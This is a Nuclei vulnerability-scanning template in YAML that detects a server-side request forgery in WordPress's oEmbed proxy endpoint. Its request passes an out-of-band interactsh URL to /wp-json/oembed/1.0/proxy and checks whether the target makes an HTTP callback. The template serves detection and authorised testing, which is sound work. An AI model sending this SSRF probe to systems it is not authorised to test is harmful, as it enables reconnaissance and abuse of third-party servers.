nuclei-templates/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml

22 lines
514 B
YAML

id: wordpress-ssrf-oembed
info:
name: Wordpress Oembed Proxy SSRF
author: dhiyaneshDk
severity: medium
reference:
- https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
- https://github.com/incogbyte/quickpress/blob/master/core/req.go
tags: wordpress,ssrf,oast,proxy
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"
matchers:
- type: word
part: interactsh_protocol
words:
- "http"